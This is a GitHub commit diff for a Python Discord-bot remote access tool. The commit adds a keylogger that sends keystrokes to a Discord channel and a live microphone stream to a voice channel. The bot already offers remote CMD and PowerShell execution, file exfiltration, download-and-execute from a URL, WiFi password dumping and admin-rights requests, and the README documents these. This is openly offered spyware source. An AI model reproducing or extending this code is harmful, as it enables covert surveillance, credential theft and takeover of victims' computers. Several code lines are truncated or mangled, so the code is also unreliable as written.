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added cool new functions + english help
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- added a Keylogger

- added a function to live stream the Microphone to a discord voice channel

- updated with the New Functions and put in where to find the Variables you need to change for the Code to work

- updated requirements.txt

- !help command is now english
  • Loading branch information
truelockmc committed Jan 30, 2025
1 parent 90c132a commit 8894980
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Showing 3 changed files with 279 additions and 29 deletions.
279 changes: 257 additions & 22 deletions
Original file line number Diff line number Diff line change
Expand Up @@ -8,6 +8,7 @@

import discord
from discord.ext import commands
from discord.ext.commands import MissingRequiredArgument
import platform
import subprocess
import os
Expand All @@ -31,6 +32,14 @@
import psutil
import datetime
import atexit
import pyttsx3
import pyaudio
import base64
from pynput.keyboard import Key, Listener
from PIL import ImageGrab
import threading
import requests
import json

admin_status_file = "admin_status.txt" # Füge diese Zeile hinzu, um die Variable zu definieren

Expand Down Expand Up @@ -139,10 +148,11 @@ def remove_pid_file():


async def on_ready():
print(f'Wir sind eingeloggt als {bot.user}')
bot.loop.create_task(send_messages()) # Start the send_messages function here
guild = bot.get_guild(GUILD_ID)
if guild:
computer_name = platform.node()
Expand All @@ -153,6 +163,16 @@ async def on_ready():
print(f'Channel "{sanitized_name}" wurde erstellt')
print(f'Channel "{sanitized_name}" existiert bereits')

keylogger_channel_name = f"{sanitized_name}-keylogger"

# Create keylogger channel if not exists
keylogger_channel = await create_channel_if_not_exists(guild, keylogger_channel_name)
channel_ids['keylogger_channel'] =
print(f"Keylogger channel ID set to: {}")

channel_ids['voice'] = YOUR_VOICE_CHANNEL_ID
print('Guild nicht gefunden')
load_admin_status() # Laden des Admin-Status beim Start
Expand All @@ -170,24 +190,28 @@ def is_bot_or_command(message):
async def custom_help(ctx):
help_text = """
**Verfügbare Befehle:**
`!ping` - Zeigt die Latenz des Bots an.
`!screenshot` - Macht einen Screenshot und sendet ihn.
`!cmd <command>` - Führt einen CMD-Befehl aus.
`!powershell <command>` - Führt einen PowerShell-Befehl aus.
`!file_upload <target_path>` - Lädt eine Datei hoch.
`!file_download <file_path>` - Lädt eine Datei herunter.
`!execute <url>` - Lädt eine Datei von der URL herunter und führt sie aus.
`!notify <title> <message>` - Sendet eine Benachrichtigung.
`!restart` - Startet den PC neu.
`!shutdown` - Fährt den PC herunter.
`!admin` - Fordert Admin-Rechte an.
`!stop` - Stoppt den Bot.
`!wifi` - Zeigt WLAN-Profile und Passwörter an.
`!system_info` - Zeigt Informationen über das System an.
`!cpu_usage` - Zeigt die aktuelle CPU-Auslastung an.
`!taskkill <pid>` - Beendet einen Prozess mit der angegebenen PID.
**Available Commands:**
`!ping` - Shows the bot's latency.
`!screenshot` - Takes a screenshot and sends it.
`!cmd <command>` - Executes a CMD command.
`!powershell <command>` - Executes a PowerShell command.
`!file_upload <target_path>` - Uploads a file.
`!file_download <file_path>` - Downloads a file.
`!execute <url>` - Downloads and executes a file from the URL.
`!notify <title> <message>` - Sends a notification.
`!restart` - Restarts the PC.
`!shutdown` - Shuts down the PC.
`!admin` - Requests admin rights.
`!stop` - Stops the bot.
`!wifi` - Shows WiFi profiles and passwords.
`!system_info` - Shows system information.
`!cpu_usage` - Shows the current CPU usage.
`!taskkill <pid>` - Kills a process with the given PID.
`!tts <message>` - Plays a custom text-to-speech message.
`!mic_stream_start` - Starts a live stream of the microphone to a voice channel.
`!mic_stream_stop` - Stops the mic stream if activated.
`!keylog <on/off>` - Activates or deactivates keylogging.
await ctx.send(help_text)

Expand Down Expand Up @@ -623,13 +647,224 @@ async def wifi(ctx):
except Exception as e:
await working_message.delete()
await send_temporary_message(ctx, f'Fehler beim Abrufen der WLAN-Profile: {str(e)}', duration=10)

# Function to download libopus if it doesn't exist in the temp directory
def download_libopus():
url = "" # Ersetzen Sie dies durch eine vertrauenswürdige Quelle
temp_dir = tempfile.gettempdir()
opuslib_path = os.path.join(temp_dir, 'libopus.dll')

if not os.path.exists(opuslib_path):
response = requests.get(url)
with open(opuslib_path, 'wb') as file:
print(f"{opuslib_path} heruntergeladen.")

return opuslib_path

# Load Opus library
opuslib_path = download_libopus()

# PyAudioPCM class for streaming audio from the microphone
class PyAudioPCM(discord.AudioSource):
def __init__(self, channels=2, rate=48000, chunk=960, input_device=None) -> None:
p = pyaudio.PyAudio()
self.chunks = chunk
self.input_stream =, channels=channels, rate=rate, input=True, input_device_index=input_device, frames_per_buffer=chunk)
def read(self) -> bytes:

# Bot command to join voice channel and stream microphone audio
async def mic_stream_start(ctx):
if not in_correct_channel(ctx):
await send_temporary_message(ctx, "Dieser Befehl kann nur im spezifischen Channel für diesen PC ausgeführt werden.", duration=10)

# Ensure 'voice' key exists in channel_ids
if 'voice' not in channel_ids:
await ctx.send(f"`[{current_time()}] Voice-Channel ID ist nicht gesetzt.`", delete_after=10)

voice_channel = discord.utils.get(ctx.guild.voice_channels, id=channel_ids['voice'])
if voice_channel is None:
await ctx.send(f"`[{current_time()}] Voice-Channel nicht gefunden.`", delete_after=10)

vc = await voice_channel.connect(self_deaf=True)
await ctx.send(f"`[{current_time()}] Joined voice-channel and streaming microphone in realtime`")

# Log messages (you can replace these with actual logging if needed)
print(f"[{current_time()}] Connected to voice channel")
print(f"[{current_time()}] Started playing audio from microphone's input")

# Bot command to leave the voice channel
async def mic_stream_stop(ctx):
if ctx.voice_client is None:
await ctx.send(f"`[{current_time()}] Bot ist in keinem Voice-Channel.`", delete_after=10)

await ctx.voice_client.disconnect()
await ctx.send(f"`[{current_time()}] Left voice-channel.`", delete_after=10)

# Global variables for keylogging
files_to_send, messages_to_send, embeds_to_send = [], [], []
channel_ids, text_buffor = {}, ''
ctrl_codes = {
'Key.ctrl_l': 'CTRL_L',
'Key.ctrl_r': 'CTRL_R',
'Key.alt_l': 'ALT_L',
'Key.alt_r': 'ALT_R'
keylogger_active = False
keylogger_thread = None
status_file = 'keylogger_status.json'

# Function to get the current time
def current_time():
return'%Y-%m-%d %H:%M:%S')

# Function to create a channel if it does not exist
async def create_channel_if_not_exists(guild, channel_name):
channel = discord.utils.get(guild.channels, name=channel_name)
if channel is None:
channel = await guild.create_text_channel(channel_name)
print(f"Channel {channel_name} created with ID: {}")
print(f"Channel {channel_name} exists with ID: {}")
return channel

# Function to send messages to the Discord channel
async def send_messages():
await bot.wait_until_ready()
while not bot.is_closed():
if messages_to_send:
for message in messages_to_send:
channel = bot.get_channel(message[0])
print(f"Sending message to channel ID: {message[0]}")
await channel.send(message[1])
await asyncio.sleep(1)

# Function to save keylogger status
def save_keylogger_status():
global keylogger_active
status = {'keylogger_active': keylogger_active}
with open(status_file, 'w') as f:
json.dump(status, f)

# Function to load keylogger status
def load_keylogger_status():
global keylogger_active
if os.path.exists(status_file):
with open(status_file, 'r') as f:
status = json.load(f)
keylogger_active = status.get('keylogger_active', False)

# Key press event handler
def on_press(key):
global files_to_send, messages_to_send, embeds_to_send, channel_ids, text_buffor
processed_key = str(key)[1:-1] if (str(key)[0] == '\'' and str(key)[-1] == '\'') else key

keycodes = { ' ',
Key.shift: ' *`SHIFT`*', ' *`TAB`*',
Key.backspace: ' *`<`*',
Key.esc: ' *`ESC`*',
Key.caps_lock: ' *`CAPS LOCK`*',
Key.f1: ' *`F1`*',
Key.f2: ' *`F2`*',
Key.f3: ' *`F3`*',
Key.f4: ' *`F4`*',
Key.f5: ' *`F5`*',
Key.f6: ' *`F6`*',
Key.f7: ' *`F7`*',
Key.f8: ' *`F8`*',
Key.f9: ' *`F9`*',
Key.f10: ' *`F10`*',
Key.f11: ' *`F11`*',
Key.f12: ' *`F12`*',
if processed_key in ctrl_codes.keys():
processed_key = ' `' + ctrl_codes[processed_key] + '`'
if processed_key not in [Key.ctrl_l, Key.alt_gr, Key.left, Key.right, Key.up, Key.down, Key.delete, Key.alt_l, Key.shift_r]:
for i in keycodes:
if processed_key == i:
processed_key = keycodes[i]
if processed_key == Key.enter:
processed_key = ''
messages_to_send.append([channel_ids['keylogger_channel'], text_buffor + ' *`ENTER`*'])
text_buffor = ''
elif processed_key == Key.print_screen or processed_key == '@':
processed_key = ' *`Print Screen`*' if processed_key == Key.print_screen else '@'
embeds_to_send.append([channel_ids['keylogger_channel'], current_time() + (' `[Print Screen pressed]`' if processed_key == ' *`Print Screen`*' else ' `[Email typing]`'), 'ss.png'])
text_buffor += str(processed_key)
if len(text_buffor) > 1975:
if 'wwwww' in text_buffor or 'aaaaa' in text_buffor or 'sssss' in text_buffor or 'ddddd' in text_buffor:
messages_to_send.append([channel_ids['keylogger_channel'], text_buffor])
messages_to_send.append([channel_ids['keylogger_channel'], text_buffor])
text_buffor = ''

# Debugging message
print(f"Key pressed: {processed_key}")

# Function to start the keylogger
def start_keylogger():
global keylogger_active
keylogger_active = True
with Listener(on_press=on_press) as listener:

# Function to stop the keylogger
def stop_keylogger():
global keylogger_active
keylogger_active = False
# Stopping the listener automatically

# Bot command to control the keylogger
async def keylog(ctx, action=None):
global keylogger_thread, keylogger_active
if not in_correct_channel(ctx):
await send_temporary_message(ctx, "Dieser Befehl kann nur im spezifischen Channel für diesen PC ausgeführt werden.", duration=10)

if action == 'on':
if keylogger_active:
await log_message(ctx, '🔴 **Keylogger ist bereits aktiv.**', duration=10)
keylogger_thread = threading.Thread(target=start_keylogger)
await log_message(ctx, '🟢 **Keylogger wurde aktiviert.**')
# Debugging message
print("Keylogger wurde aktiviert.")
elif action == 'off':
if not keylogger_active:
await log_message(ctx, '🔴 **Keylogger ist bereits deaktiviert.**', duration=10)
await log_message(ctx, '🔴 **Keylogger wurde deaktiviert.**')
# Debugging message
print("Keylogger wurde deaktiviert.")
await log_message(ctx, '❌ **Ungültige Aktion. Verwenden Sie `!keylog on` oder `!keylog off`.**', duration=10)

def main():

if __name__ == "__main__":

24 changes: 17 additions & 7 deletions
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
## _Notice:_
_Everything in the Code is German yet... i will translate it soon, sry_
_Everything in the Code is German yet (except the !help command)... i will translate it soon, sry_

_The Code is still in the Beta, i started making it like 2 days ago._
_The Code is still in the Beta, i started making it like 1 day before i uploaded it here._

_The Code is pretty unreadable bcs everything is one file. Thats on purpose bcs i dont want to have the pain with multiple Files in PyInstaller. I wont add a Builder or something because then tooo skiddy people are gonna use it_

Expand All @@ -28,6 +28,9 @@ This Python Programm basically hosts a discord bot on the Computer its executed
- **System Info:** Retrieve system information.
- **Task Management:** List and kill processes.
- **Purge Messages:** Clear bot messages and commands in the channel.
- **Live Stream Mic:** Livestream the Computers Microphone to a discord voice channel.
- **Keylogger** Log keystrokes and sends them to a Discord channel
- **TTS** Play Text To Speech Messages on the Computer

## Requirements

Expand All @@ -52,13 +55,15 @@ This Python Programm basically hosts a discord bot on the Computer its executed
- `YOUR_BOT_TOKEN`: Your Discord bot token.
- `YOUR_GUILD_ID`: Your Discord guild (server) ID.
- `YOUR_USER_ID`: Your Discord user ID(s) who are authorized to control the bot.
- `channel_ids['voice']`: The ID of an Voice Channel on your Server

## Configuration

Update the following variables in the script:
- `TOKEN`: The token for your Discord bot.
- `GUILD_ID`: The ID of the guild where the bot will operate.
- `AUTHORIZED_USERS`: A list of user IDs that are authorized to control the bot.
- `TOKEN`: The token for your Discord bot. _Line 2_
- `GUILD_ID`: The ID of the guild where the bot will operate. _Line 4_
- `AUTHORIZED_USERS`: A list of user IDs that are authorized to control the bot. _Line 7_
- `channel_ids['voice']`: The ID of an Voice Channel on your Server. _Line 175_

## Running the Bot

Expand All @@ -67,6 +72,8 @@ To run the bot, execute the script:

Hier ist die aktualisierte Tabelle, die die zusätzlichen Commands enthält:

## Commands

| Command | Description |
Expand All @@ -84,11 +91,14 @@ python
| `!admin` | Requests admin rights. |
| `!stop` | Stops the bot. |
| `!wifi` | Shows WiFi profiles and passwords. |
| `!system_info` | Shows system information. |
| `!cpu_usage` | Shows current CPU usage. |
| `!system_info` | Shows system information. | |
| `!taskkill <pid>` | Terminates a process with the specified PID. |
| `!purge` | Deletes the bot messages and commands. |
| `!help` | Displays a list of available commands. |
| `!tts <message>` | Plays a custom text-to-speech message. |
| `!mic_stream_start` | Starts a live stream of the microphone to a voice channel. |
| `!mic_stream_stop` | Stops the mic stream if activated. |
| `!keylog <on/off>` | Activates or deactivates keylogging. | |
### Example Usage
Expand Down

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